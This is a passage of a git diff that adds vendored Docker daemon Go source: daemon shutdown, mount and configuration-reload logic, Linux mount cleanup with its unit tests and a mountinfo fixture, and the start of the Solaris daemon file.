+	// By default we use daemon's ShutdownTimeout.
+	shutdownTimeout := daemon.configStore.ShutdownTimeout
+
+	graceTimeout := 5
+	if daemon.containers != nil {
+		for _, c := range daemon.containers.List() {
+			if shutdownTimeout >= 0 {
+				stopTimeout := c.StopTimeout()
+				if stopTimeout < 0 {
+					shutdownTimeout = -1
+				} else {
+					if stopTimeout+graceTimeout > shutdownTimeout {
+						shutdownTimeout = stopTimeout + graceTimeout
+					}
+				}
+			}
+		}
+	}
+	return shutdownTimeout
+}
+
+// Shutdown stops the daemon.
+func (daemon *Daemon) Shutdown() error {
+	daemon.shutdown = true
+	// Keep mounts and networking running on daemon shutdown if
+	// we are to keep containers running and restore them.
+
+	if daemon.configStore.LiveRestoreEnabled && daemon.containers != nil {
+		// check if there are any running containers, if none we should do some cleanup
+		if ls, err := daemon.Containers(&types.ContainerListOptions{}); len(ls) != 0 || err != nil {
+			return nil
+		}
+	}
+
+	if daemon.containers != nil {
+		logrus.Debugf("start clean shutdown of all containers with a %d seconds timeout...", daemon.configStore.ShutdownTimeout)
+		daemon.containers.ApplyAll(func(c *container.Container) {
+			if !c.IsRunning() {
+				return
+			}
+			logrus.Debugf("stopping %s", c.ID)
+			if err := daemon.shutdownContainer(c); err != nil {
+				logrus.Errorf("Stop container error: %v", err)
+				return
+			}
+			if mountid, err := daemon.layerStore.GetMountID(c.ID); err == nil {
+				daemon.cleanupMountsByID(mountid)
+			}
+			logrus.Debugf("container stopped %s", c.ID)
+		})
+	}
+
+	if daemon.volumes != nil {
+		if err := daemon.volumes.Shutdown(); err != nil {
+			logrus.Errorf("Error shutting down volume store: %v", err)
+		}
+	}
+
+	if daemon.layerStore != nil {
+		if err := daemon.layerStore.Cleanup(); err != nil {
+			logrus.Errorf("Error during layer Store.Cleanup(): %v", err)
+		}
+	}
+
+	// Shutdown plugins after containers and layerstore. Don't change the order.
+	daemon.pluginShutdown()
+
+	// trigger libnetwork Stop only if it's initialized
+	if daemon.netController != nil {
+		daemon.netController.Stop()
+	}
+
+	if err := daemon.cleanupMounts(); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// Mount sets container.BaseFS
+// (is it not set coming in? why is it unset?)
+func (daemon *Daemon) Mount(container *container.Container) error {
+	dir, err := container.RWLayer.Mount(container.GetMountLabel())
+	if err != nil {
+		return err
+	}
+	logrus.Debugf("container mounted via layerStore: %v", dir)
+
+	if container.BaseFS != dir {
+		// The mount path reported by the graph driver should always be trusted on Windows, since the
+		// volume path for a given mounted layer may change over time.  This should only be an error
+		// on non-Windows operating systems.
+		if container.BaseFS != "" && runtime.GOOS != "windows" {
+			daemon.Unmount(container)
+			return fmt.Errorf("Error: driver %s is returning inconsistent paths for container %s ('%s' then '%s')",
+				daemon.GraphDriverName(), container.ID, container.BaseFS, dir)
+		}
+	}
+	container.BaseFS = dir // TODO: combine these fields
+	return nil
+}
+
+// Unmount unsets the container base filesystem
+func (daemon *Daemon) Unmount(container *container.Container) error {
+	if err := container.RWLayer.Unmount(); err != nil {
+		logrus.Errorf("Error unmounting container %s: %s", container.ID, err)
+		return err
+	}
+
+	return nil
+}
+
+// V4Subnets returns the IPv4 subnets of networks that are managed by Docker.
+func (daemon *Daemon) V4Subnets() []net.IPNet {
+	var subnets []net.IPNet
+
+	managedNetworks := daemon.netController.Networks()
+
+	for _, managedNetwork := range managedNetworks {
+		v4Infos, _ := managedNetwork.Info().IpamInfo()
+		for _, v4Info := range v4Infos {
+			if v4Info.IPAMData.Pool != nil {
+				subnets = append(subnets, *v4Info.IPAMData.Pool)
+			}
+		}
+	}
+
+	return subnets
+}
+
+// V6Subnets returns the IPv6 subnets of networks that are managed by Docker.
+func (daemon *Daemon) V6Subnets() []net.IPNet {
+	var subnets []net.IPNet
+
+	managedNetworks := daemon.netController.Networks()
+
+	for _, managedNetwork := range managedNetworks {
+		_, v6Infos := managedNetwork.Info().IpamInfo()
+		for _, v6Info := range v6Infos {
+			if v6Info.IPAMData.Pool != nil {
+				subnets = append(subnets, *v6Info.IPAMData.Pool)
+			}
+		}
+	}
+
+	return subnets
+}
+
+// GraphDriverName returns the name of the graph driver used by the layer.Store
+func (daemon *Daemon) GraphDriverName() string {
+	return daemon.layerStore.DriverName()
+}
+
+// GetUIDGIDMaps returns the current daemon's user namespace settings
+// for the full uid and gid maps which will be applied to containers
+// started in this instance.
+func (daemon *Daemon) GetUIDGIDMaps() ([]idtools.IDMap, []idtools.IDMap) {
+	return daemon.uidMaps, daemon.gidMaps
+}
+
+// GetRemappedUIDGID returns the current daemon's uid and gid values
+// if user namespaces are in use for this daemon instance.  If not
+// this function will return "real" root values of 0, 0.
+func (daemon *Daemon) GetRemappedUIDGID() (int, int) {
+	uid, gid, _ := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps)
+	return uid, gid
+}
+
+// tempDir returns the default directory to use for temporary files.
+func tempDir(rootDir string, rootUID, rootGID int) (string, error) {
+	var tmpDir string
+	if tmpDir = os.Getenv("DOCKER_TMPDIR"); tmpDir == "" {
+		tmpDir = filepath.Join(rootDir, "tmp")
+	}
+	return tmpDir, idtools.MkdirAllAs(tmpDir, 0700, rootUID, rootGID)
+}
+
+func (daemon *Daemon) setupInitLayer(initPath string) error {
+	rootUID, rootGID := daemon.GetRemappedUIDGID()
+	return initlayer.Setup(initPath, rootUID, rootGID)
+}
+
+func setDefaultMtu(config *Config) {
+	// do nothing if the config does not have the default 0 value.
+	if config.Mtu != 0 {
+		return
+	}
+	config.Mtu = defaultNetworkMtu
+}
+
+func (daemon *Daemon) configureVolumes(rootUID, rootGID int) (*store.VolumeStore, error) {
+	volumesDriver, err := local.New(daemon.configStore.Root, rootUID, rootGID)
+	if err != nil {
+		return nil, err
+	}
+
+	volumedrivers.RegisterPluginGetter(daemon.PluginStore)
+
+	if !volumedrivers.Register(volumesDriver, volumesDriver.Name()) {
+		return nil, fmt.Errorf("local volume driver could not be registered")
+	}
+	return store.New(daemon.configStore.Root)
+}
+
+// IsShuttingDown tells whether the daemon is shutting down or not
+func (daemon *Daemon) IsShuttingDown() bool {
+	return daemon.shutdown
+}
+
+// initDiscovery initializes the discovery watcher for this daemon.
+func (daemon *Daemon) initDiscovery(config *Config) error {
+	advertise, err := parseClusterAdvertiseSettings(config.ClusterStore, config.ClusterAdvertise)
+	if err != nil {
+		if err == errDiscoveryDisabled {
+			return nil
+		}
+		return err
+	}
+
+	config.ClusterAdvertise = advertise
+	discoveryWatcher, err := initDiscovery(config.ClusterStore, config.ClusterAdvertise, config.ClusterOpts)
+	if err != nil {
+		return fmt.Errorf("discovery initialization failed (%v)", err)
+	}
+
+	daemon.discoveryWatcher = discoveryWatcher
+	return nil
+}
+
+// Reload reads configuration changes and modifies the
+// daemon according to those changes.
+// These are the settings that Reload changes:
+// - Daemon labels.
+// - Daemon debug log level.
+// - Daemon insecure registries.
+// - Daemon max concurrent downloads
+// - Daemon max concurrent uploads
+// - Cluster discovery (reconfigure and restart).
+// - Daemon live restore
+// - Daemon shutdown timeout (in seconds).
+func (daemon *Daemon) Reload(config *Config) (err error) {
+
+	daemon.configStore.reloadLock.Lock()
+
+	attributes := daemon.platformReload(config)
+
+	defer func() {
+		// we're unlocking here, because
+		// LogDaemonEventWithAttributes() -> SystemInfo() -> GetAllRuntimes()
+		// holds that lock too.
+		daemon.configStore.reloadLock.Unlock()
+		if err == nil {
+			daemon.LogDaemonEventWithAttributes("reload", attributes)
+		}
+	}()
+
+	if err := daemon.reloadClusterDiscovery(config); err != nil {
+		return err
+	}
+
+	if config.IsValueSet("labels") {
+		daemon.configStore.Labels = config.Labels
+	}
+	if config.IsValueSet("debug") {
+		daemon.configStore.Debug = config.Debug
+	}
+	if config.IsValueSet("insecure-registries") {
+		daemon.configStore.InsecureRegistries = config.InsecureRegistries
+		if err := daemon.RegistryService.LoadInsecureRegistries(config.InsecureRegistries); err != nil {
+			return err
+		}
+	}
+	if config.IsValueSet("live-restore") {
+		daemon.configStore.LiveRestoreEnabled = config.LiveRestoreEnabled
+		if err := daemon.containerdRemote.UpdateOptions(libcontainerd.WithLiveRestore(config.LiveRestoreEnabled)); err != nil {
+			return err
+		}
+	}
+
+	// If no value is set for max-concurrent-downloads we assume it is the default value
+	// We always "reset" as the cost is lightweight and easy to maintain.
+	if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil {
+		*daemon.configStore.MaxConcurrentDownloads = *config.MaxConcurrentDownloads
+	} else {
+		maxConcurrentDownloads := defaultMaxConcurrentDownloads
+		daemon.configStore.MaxConcurrentDownloads = &maxConcurrentDownloads
+	}
+	logrus.Debugf("Reset Max Concurrent Downloads: %d", *daemon.configStore.MaxConcurrentDownloads)
+	if daemon.downloadManager != nil {
+		daemon.downloadManager.SetConcurrency(*daemon.configStore.MaxConcurrentDownloads)
+	}
+
+	// If no value is set for max-concurrent-upload we assume it is the default value
+	// We always "reset" as the cost is lightweight and easy to maintain.
+	if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil {
+		*daemon.configStore.MaxConcurrentUploads = *config.MaxConcurrentUploads
+	} else {
+		maxConcurrentUploads := defaultMaxConcurrentUploads
+		daemon.configStore.MaxConcurrentUploads = &maxConcurrentUploads
+	}
+	logrus.Debugf("Reset Max Concurrent Uploads: %d", *daemon.configStore.MaxConcurrentUploads)
+	if daemon.uploadManager != nil {
+		daemon.uploadManager.SetConcurrency(*daemon.configStore.MaxConcurrentUploads)
+	}
+
+	if config.IsValueSet("shutdown-timeout") {
+		daemon.configStore.ShutdownTimeout = config.ShutdownTimeout
+		logrus.Debugf("Reset Shutdown Timeout: %d", daemon.configStore.ShutdownTimeout)
+	}
+
+	// We emit daemon reload event here with updatable configurations
+	attributes["debug"] = fmt.Sprintf("%t", daemon.configStore.Debug)
+	attributes["live-restore"] = fmt.Sprintf("%t", daemon.configStore.LiveRestoreEnabled)
+
+	if daemon.configStore.InsecureRegistries != nil {
+		insecureRegistries, err := json.Marshal(daemon.configStore.InsecureRegistries)
+		if err != nil {
+			return err
+		}
+		attributes["insecure-registries"] = string(insecureRegistries)
+	} else {
+		attributes["insecure-registries"] = "[]"
+	}
+
+	attributes["cluster-store"] = daemon.configStore.ClusterStore
+	if daemon.configStore.ClusterOpts != nil {
+		opts, err := json.Marshal(daemon.configStore.ClusterOpts)
+		if err != nil {
+			return err
+		}
+		attributes["cluster-store-opts"] = string(opts)
+	} else {
+		attributes["cluster-store-opts"] = "{}"
+	}
+	attributes["cluster-advertise"] = daemon.configStore.ClusterAdvertise
+
+	if daemon.configStore.Labels != nil {
+		labels, err := json.Marshal(daemon.configStore.Labels)
+		if err != nil {
+			return err
+		}
+		attributes["labels"] = string(labels)
+	} else {
+		attributes["labels"] = "[]"
+	}
+
+	attributes["max-concurrent-downloads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentDownloads)
+	attributes["max-concurrent-uploads"] = fmt.Sprintf("%d", *daemon.configStore.MaxConcurrentUploads)
+	attributes["shutdown-timeout"] = fmt.Sprintf("%d", daemon.configStore.ShutdownTimeout)
+
+	return nil
+}
+
+func (daemon *Daemon) reloadClusterDiscovery(config *Config) error {
+	var err error
+	newAdvertise := daemon.configStore.ClusterAdvertise
+	newClusterStore := daemon.configStore.ClusterStore
+	if config.IsValueSet("cluster-advertise") {
+		if config.IsValueSet("cluster-store") {
+			newClusterStore = config.ClusterStore
+		}
+		newAdvertise, err = parseClusterAdvertiseSettings(newClusterStore, config.ClusterAdvertise)
+		if err != nil && err != errDiscoveryDisabled {
+			return err
+		}
+	}
+
+	if daemon.clusterProvider != nil {
+		if err := config.isSwarmCompatible(); err != nil {
+			return err
+		}
+	}
+
+	// check discovery modifications
+	if !modifiedDiscoverySettings(daemon.configStore, newAdvertise, newClusterStore, config.ClusterOpts) {
+		return nil
+	}
+
+	// enable discovery for the first time if it was not previously enabled
+	if daemon.discoveryWatcher == nil {
+		discoveryWatcher, err := initDiscovery(newClusterStore, newAdvertise, config.ClusterOpts)
+		if err != nil {
+			return fmt.Errorf("discovery initialization failed (%v)", err)
+		}
+		daemon.discoveryWatcher = discoveryWatcher
+	} else {
+		if err == errDiscoveryDisabled {
+			// disable discovery if it was previously enabled and it's disabled now
+			daemon.discoveryWatcher.Stop()
+		} else {
+			// reload discovery
+			if err = daemon.discoveryWatcher.Reload(config.ClusterStore, newAdvertise, config.ClusterOpts); err != nil {
+				return err
+			}
+		}
+	}
+
+	daemon.configStore.ClusterStore = newClusterStore
+	daemon.configStore.ClusterOpts = config.ClusterOpts
+	daemon.configStore.ClusterAdvertise = newAdvertise
+
+	if daemon.netController == nil {
+		return nil
+	}
+	netOptions, err := daemon.networkOptions(daemon.configStore, daemon.PluginStore, nil)
+	if err != nil {
+		logrus.WithError(err).Warnf("failed to get options with network controller")
+		return nil
+	}
+	err = daemon.netController.ReloadConfiguration(netOptions...)
+	if err != nil {
+		logrus.Warnf("Failed to reload configuration with network controller: %v", err)
+	}
+
+	return nil
+}
+
+func isBridgeNetworkDisabled(config *Config) bool {
+	return config.bridgeConfig.Iface == disableNetworkBridge
+}
+
+func (daemon *Daemon) networkOptions(dconfig *Config, pg plugingetter.PluginGetter, activeSandboxes map[string]interface{}) ([]nwconfig.Option, error) {
+	options := []nwconfig.Option{}
+	if dconfig == nil {
+		return options, nil
+	}
+
+	options = append(options, nwconfig.OptionExperimental(dconfig.Experimental))
+	options = append(options, nwconfig.OptionDataDir(dconfig.Root))
+	options = append(options, nwconfig.OptionExecRoot(dconfig.GetExecRoot()))
+
+	dd := runconfig.DefaultDaemonNetworkMode()
+	dn := runconfig.DefaultDaemonNetworkMode().NetworkName()
+	options = append(options, nwconfig.OptionDefaultDriver(string(dd)))
+	options = append(options, nwconfig.OptionDefaultNetwork(dn))
+
+	if strings.TrimSpace(dconfig.ClusterStore) != "" {
+		kv := strings.Split(dconfig.ClusterStore, "://")
+		if len(kv) != 2 {
+			return nil, fmt.Errorf("kv store daemon config must be of the form KV-PROVIDER://KV-URL")
+		}
+		options = append(options, nwconfig.OptionKVProvider(kv[0]))
+		options = append(options, nwconfig.OptionKVProviderURL(kv[1]))
+	}
+	if len(dconfig.ClusterOpts) > 0 {
+		options = append(options, nwconfig.OptionKVOpts(dconfig.ClusterOpts))
+	}
+
+	if daemon.discoveryWatcher != nil {
+		options = append(options, nwconfig.OptionDiscoveryWatcher(daemon.discoveryWatcher))
+	}
+
+	if dconfig.ClusterAdvertise != "" {
+		options = append(options, nwconfig.OptionDiscoveryAddress(dconfig.ClusterAdvertise))
+	}
+
+	options = append(options, nwconfig.OptionLabels(dconfig.Labels))
+	options = append(options, driverOptions(dconfig)...)
+
+	if daemon.configStore != nil && daemon.configStore.LiveRestoreEnabled && len(activeSandboxes) != 0 {
+		options = append(options, nwconfig.OptionActiveSandboxes(activeSandboxes))
+	}
+
+	if pg != nil {
+		options = append(options, nwconfig.OptionPluginGetter(pg))
+	}
+
+	return options, nil
+}
+
+func copyBlkioEntry(entries []*containerd.BlkioStatsEntry) []types.BlkioStatEntry {
+	out := make([]types.BlkioStatEntry, len(entries))
+	for i, re := range entries {
+		out[i] = types.BlkioStatEntry{
+			Major: re.Major,
+			Minor: re.Minor,
+			Op:    re.Op,
+			Value: re.Value,
+		}
+	}
+	return out
+}
+
+// GetCluster returns the cluster
+func (daemon *Daemon) GetCluster() Cluster {
+	return daemon.cluster
+}
+
+// SetCluster sets the cluster
+func (daemon *Daemon) SetCluster(cluster Cluster) {
+	daemon.cluster = cluster
+}
+
+func (daemon *Daemon) pluginShutdown() {
+	manager := daemon.pluginManager
+	// Check for a valid manager object. In error conditions, daemon init can fail
+	// and shutdown called, before plugin manager is initialized.
+	if manager != nil {
+		manager.Shutdown()
+	}
+}
+
+// PluginManager returns current pluginManager associated with the daemon
+func (daemon *Daemon) PluginManager() *plugin.Manager { // set up before daemon to avoid this method
+	return daemon.pluginManager
+}
+
+// PluginGetter returns current pluginStore associated with the daemon
+func (daemon *Daemon) PluginGetter() *plugin.Store {
+	return daemon.PluginStore
+}
+
+// CreateDaemonRoot creates the root for the daemon
+func CreateDaemonRoot(config *Config) error {
+	// get the canonical path to the Docker root directory
+	var realRoot string
+	if _, err := os.Stat(config.Root); err != nil && os.IsNotExist(err) {
+		realRoot = config.Root
+	} else {
+		realRoot, err = fileutils.ReadSymlinkedDirectory(config.Root)
+		if err != nil {
+			return fmt.Errorf("Unable to get the full path to root (%s): %s", config.Root, err)
+		}
+	}
+
+	uidMaps, gidMaps, err := setupRemappedRoot(config)
+	if err != nil {
+		return err
+	}
+	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
+	if err != nil {
+		return err
+	}
+
+	if err := setupDaemonRoot(config, realRoot, rootUID, rootGID); err != nil {
+		return err
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_experimental.go b/vendor/github.com/docker/docker/daemon/daemon_experimental.go
new file mode 100644
index 0000000000..fb0251d4af
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon_experimental.go
@@ -0,0 +1,7 @@
+package daemon
+
+import "github.com/docker/docker/api/types/container"
+
+func (daemon *Daemon) verifyExperimentalContainerSettings(hostConfig *container.HostConfig, config *container.Config) ([]string, error) {
+	return nil, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux.go b/vendor/github.com/docker/docker/daemon/daemon_linux.go
new file mode 100644
index 0000000000..9bdf6e2b79
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon_linux.go
@@ -0,0 +1,80 @@
+package daemon
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"os"
+	"regexp"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/mount"
+)
+
+func (daemon *Daemon) cleanupMountsByID(id string) error {
+	logrus.Debugf("Cleaning up old mountid %s: start.", id)
+	f, err := os.Open("/proc/self/mountinfo")
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+
+	return daemon.cleanupMountsFromReaderByID(f, id, mount.Unmount)
+}
+
+func (daemon *Daemon) cleanupMountsFromReaderByID(reader io.Reader, id string, unmount func(target string) error) error {
+	if daemon.root == "" {
+		return nil
+	}
+	var errors []string
+
+	regexps := getCleanPatterns(id)
+	sc := bufio.NewScanner(reader)
+	for sc.Scan() {
+		if fields := strings.Fields(sc.Text()); len(fields) >= 4 {
+			if mnt := fields[4]; strings.HasPrefix(mnt, daemon.root) {
+				for _, p := range regexps {
+					if p.MatchString(mnt) {
+						if err := unmount(mnt); err != nil {
+							logrus.Error(err)
+							errors = append(errors, err.Error())
+						}
+					}
+				}
+			}
+		}
+	}
+
+	if err := sc.Err(); err != nil {
+		return err
+	}
+
+	if len(errors) > 0 {
+		return fmt.Errorf("Error cleaning up mounts:\n%v", strings.Join(errors, "\n"))
+	}
+
+	logrus.Debugf("Cleaning up old mountid %v: done.", id)
+	return nil
+}
+
+// cleanupMounts umounts shm/mqueue mounts for old containers
+func (daemon *Daemon) cleanupMounts() error {
+	return daemon.cleanupMountsByID("")
+}
+
+func getCleanPatterns(id string) (regexps []*regexp.Regexp) {
+	var patterns []string
+	if id == "" {
+		id = "[0-9a-f]{64}"
+		patterns = append(patterns, "containers/"+id+"/shm")
+	}
+	patterns = append(patterns, "aufs/mnt/"+id+"$", "overlay/"+id+"/merged$", "zfs/graph/"+id+"$")
+	for _, p := range patterns {
+		r, err := regexp.Compile(p)
+		if err == nil {
+			regexps = append(regexps, r)
+		}
+	}
+	return
+}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_linux_test.go b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go
new file mode 100644
index 0000000000..c40b13ba4c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon_linux_test.go
@@ -0,0 +1,104 @@
+// +build linux
+
+package daemon
+
+import (
+	"strings"
+	"testing"
+)
+
+const mountsFixture = `142 78 0:38 / / rw,relatime - aufs none rw,si=573b861da0b3a05b,dio
+143 142 0:60 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
+144 142 0:67 / /dev rw,nosuid - tmpfs tmpfs rw,mode=755
+145 144 0:78 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
+146 144 0:49 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
+147 142 0:84 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw
+148 147 0:86 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
+149 148 0:22 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
+150 148 0:25 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/cpu rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu
+151 148 0:27 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/cpuacct rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuacct
+152 148 0:28 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
+153 148 0:29 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
+154 148 0:30 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
+155 148 0:31 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
+156 148 0:32 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
+157 148 0:33 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
+158 148 0:35 /docker/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime - cgroup systemd rw,name=systemd
+159 142 8:4 /home/mlaventure/gopath /home/mlaventure/gopath rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered
+160 142 8:4 /var/lib/docker/volumes/9a428b651ee4c538130143cad8d87f603a4bf31b928afe7ff3ecd65480692b35/_data /var/lib/docker rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered
+164 142 8:4 /home/mlaventure/gopath/src/github.com/docker/docker /go/src/github.com/docker/docker rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered
+165 142 8:4 /var/lib/docker/containers/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered
+166 142 8:4 /var/lib/docker/containers/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a/hostname /etc/hostname rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered
+167 142 8:4 /var/lib/docker/containers/5425782a95e643181d8a485a2bab3c0bb21f51d7dfc03511f0e6fbf3f3aa356a/hosts /etc/hosts rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered
+168 144 0:39 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
+169 144 0:12 /14 /dev/console rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=000
+83 147 0:10 / /sys/kernel/security rw,relatime - securityfs none rw
+89 142 0:87 / /tmp rw,relatime - tmpfs none rw
+97 142 0:60 / /run/docker/netns/default rw,nosuid,nodev,noexec,relatime - proc proc rw
+100 160 8:4 /var/lib/docker/volumes/9a428b651ee4c538130143cad8d87f603a4bf31b928afe7ff3ecd65480692b35/_data/aufs /var/lib/docker/aufs rw,relatime - ext4 /dev/disk/by-uuid/d99e196c-1fc4-4b4f-bab9-9962b2b34e99 rw,errors=remount-ro,data=ordered
+115 100 0:102 / /var/lib/docker/aufs/mnt/0ecda1c63e5b58b3d89ff380bf646c95cc980252cf0b52466d43619aec7c8432 rw,relatime - aufs none rw,si=573b861dbc01905b,dio
+116 160 0:107 / /var/lib/docker/containers/d045dc441d2e2e1d5b3e328d47e5943811a40819fb47497c5f5a5df2d6d13c37/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
+118 142 0:102 / /run/docker/libcontainerd/d045dc441d2e2e1d5b3e328d47e5943811a40819fb47497c5f5a5df2d6d13c37/rootfs rw,relatime - aufs none rw,si=573b861dbc01905b,dio
+242 142 0:60 / /run/docker/netns/c3664df2a0f7 rw,nosuid,nodev,noexec,relatime - proc proc rw
+120 100 0:122 / /var/lib/docker/aufs/mnt/03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d rw,relatime - aufs none rw,si=573b861eb147805b,dio
+171 142 0:122 / /run/docker/libcontainerd/e406ff6f3e18516d50e03dbca4de54767a69a403a6f7ec1edc2762812824521e/rootfs rw,relatime - aufs none rw,si=573b861eb147805b,dio
+310 142 0:60 / /run/docker/netns/71a18572176b rw,nosuid,nodev,noexec,relatime - proc proc rw
+`
+
+func TestCleanupMounts(t *testing.T) {
+	d := &Daemon{
+		root: "/var/lib/docker/",
+	}
+
+	expected := "/var/lib/docker/containers/d045dc441d2e2e1d5b3e328d47e5943811a40819fb47497c5f5a5df2d6d13c37/shm"
+	var unmounted int
+	unmount := func(target string) error {
+		if target == expected {
+			unmounted++
+		}
+		return nil
+	}
+
+	d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "", unmount)
+
+	if unmounted != 1 {
+		t.Fatalf("Expected to unmount the shm (and the shm only)")
+	}
+}
+
+func TestCleanupMountsByID(t *testing.T) {
+	d := &Daemon{
+		root: "/var/lib/docker/",
+	}
+
+	expected := "/var/lib/docker/aufs/mnt/03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d"
+	var unmounted int
+	unmount := func(target string) error {
+		if target == expected {
+			unmounted++
+		}
+		return nil
+	}
+
+	d.cleanupMountsFromReaderByID(strings.NewReader(mountsFixture), "03ca4b49e71f1e49a41108829f4d5c70ac95934526e2af8984a1f65f1de0715d", unmount)
+
+	if unmounted != 1 {
+		t.Fatalf("Expected to unmount the auf root (and that only)")
+	}
+}
+
+func TestNotCleanupMounts(t *testing.T) {
+	d := &Daemon{
+		repository: "",
+	}
+	var unmounted bool
+	unmount := func(target string) error {
+		unmounted = true
+		return nil
+	}
+	mountInfo := `234 232 0:59 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k`
+	d.cleanupMountsFromReaderByID(strings.NewReader(mountInfo), "", unmount)
+	if unmounted {
+		t.Fatalf("Expected not to clean up /dev/shm")
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_solaris.go b/vendor/github.com/docker/docker/daemon/daemon_solaris.go
new file mode 100644
index 0000000000..2b4d8d0216
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon_solaris.go
@@ -0,0 +1,523 @@
+// +build solaris,cgo
+
+package daemon
+
+import (
+	"fmt"
+	"net"
+	"strconv"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/parsers/kernel"
+	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/docker/docker/reference"
+	"github.com/docker/libnetwork"
+	nwconfig "github.com/docker/libnetwork/config"
+	"github.com/docker/libnetwork/drivers/solaris/bridge"
+	"github.com/docker/libnetwork/netlabel"
+	"github.com/docker/libnetwork/netutils"
+	lntypes "github.com/docker/libnetwork/types"
+	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	"github.com/pkg/errors"
+)
+
+//#include <zone.h>
+import "C"
+
+const (
+	defaultVirtualSwitch = "Virtual Switch"
+	platformSupported    = true
+	solarisMinCPUShares  = 1
+	solarisMaxCPUShares  = 65535
+)
+
+func getMemoryResources(config containertypes.Resources) specs.CappedMemory {
+	memory := specs.CappedMemory{}
+
+	if config.Memory > 0 {
+		memory.Physical = strconv.FormatInt(config.Memory, 10)
+	}
+
+	if config.MemorySwap != 0 {
+		memory.Swap = strconv.FormatInt(config.MemorySwap, 10)
+	}
+
+	return memory
+}
+
+func getCPUResources(config containertypes.Resources) specs.CappedCPU {
+	cpu := specs.CappedCPU{}
+
